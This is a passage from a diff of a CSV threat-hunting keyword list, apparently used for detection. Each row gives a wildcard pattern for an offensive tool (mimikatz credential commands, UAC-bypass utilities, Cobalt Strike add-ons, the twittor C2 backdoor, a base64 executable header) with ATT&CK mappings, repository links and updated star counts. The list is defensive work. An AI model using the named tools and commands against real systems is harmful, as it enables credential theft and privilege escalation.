T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation 
tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*ts::logonpasswords*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*ts::mstsc*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*ts::multirdp*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. 
PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*ts::remote*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*ts::sessions*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*ts::logonpasswords*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*ts::mstsc*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*ts::multirdp*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*ts::remote*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*ts::sessions*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*tspkg/decryptor.py*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" "*TunnelGRE/Augustus*","offensive_tool_keyword","Augustus","Augustus is a Golang loader that execute shellcode utilizing the process hollowing technique with anti-sandbox and anti-analysis measures. 
The shellcode is encrypted with the Triple DES (3DES) encryption algorithm.","T1055.012 - T1027.002 - T1136.001 - T1562.001","TA0005 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/TunnelGRE/Augustus","1","1","N/A","6","2","107","23","2023-08-27T10:37:51Z","2023-08-21T15:08:40Z" "*turn_keylogger*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*TVqQAAMAAAAEAAAA*","offensive_tool_keyword","base64","start of an executable payload in base64","T1574.002 - T1547.008 - T1059.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*TVqQAAMAAAAEAAAA*","offensive_tool_keyword","base64","start of an executable payload in base64","T1574.002 - T1547.008 - T1059.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*TVqQAAMAAAAEAAAA*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*twint -g=*km* -o * --csv*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - 
T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*twint -u * --since *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*twittor.py*","offensive_tool_keyword","twittor","A fully featured backdoor that uses Twitter as a C&C server ","T1105 - T1102 - T1041","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/PaulSec/twittor","1","1","N/A","10","10","743","253","2020-09-30T13:47:31Z","2015-09-09T07:23:25Z" -"*twittor-master.zip*","offensive_tool_keyword","twittor","A fully featured backdoor that uses Twitter as a C&C server ","T1105 - T1102 - T1041","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/PaulSec/twittor","1","1","N/A","10","10","743","253","2020-09-30T13:47:31Z","2015-09-09T07:23:25Z" +"*twittor.py*","offensive_tool_keyword","twittor","A fully featured backdoor that uses Twitter as a C&C server ","T1105 - T1102 - T1041","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/PaulSec/twittor","1","1","N/A","10","10","743","254","2020-09-30T13:47:31Z","2015-09-09T07:23:25Z" +"*twittor-master.zip*","offensive_tool_keyword","twittor","A fully featured backdoor that uses Twitter as a C&C server ","T1105 - T1102 - T1041","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/PaulSec/twittor","1","1","N/A","10","10","743","254","2020-09-30T13:47:31Z","2015-09-09T07:23:25Z" "*TWV0YXNwbG9pdCBSUEMgTG9hZGVy*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit 
Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" "*Tycx2ry/SweetPotato*","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - 
TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","1","N/A","10","10","236","49","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z" "*Tylous/SourcePoint*","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","10","10","792","122","2022-11-17T01:04:04Z","2021-08-06T20:55:26Z" 
@@ -17885,24 +18069,24 @@ "*uac fodhelper *","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" "*uac sdclt *","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" "*uac_bypass*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" -"*uac_easinvoker.*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! 
Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","271","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" -"*UACBypass -*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*uac_easinvoker.*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*UACBypass -*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*UAC-bypass*","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1","1","0","N/A","N/A","","N/A","","","" 
-"*uacbypass_files*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","271","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*uacbypass_files*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" "*UACBypass-BOF*","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","10","10","104","33","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z" "*UACBypassedService.exe*","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","1","N/A","8","1","57","9","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z" -"*uacm4gic*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*UACME-master*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*uac-schtasks *","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - 
TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","0","N/A","10","10","812","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" +"*uacm4gic*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*UACME-master*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*uac-schtasks *","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - 
TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","0","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" "*uac-schtasks*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*uac-silentcleanup*","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - 
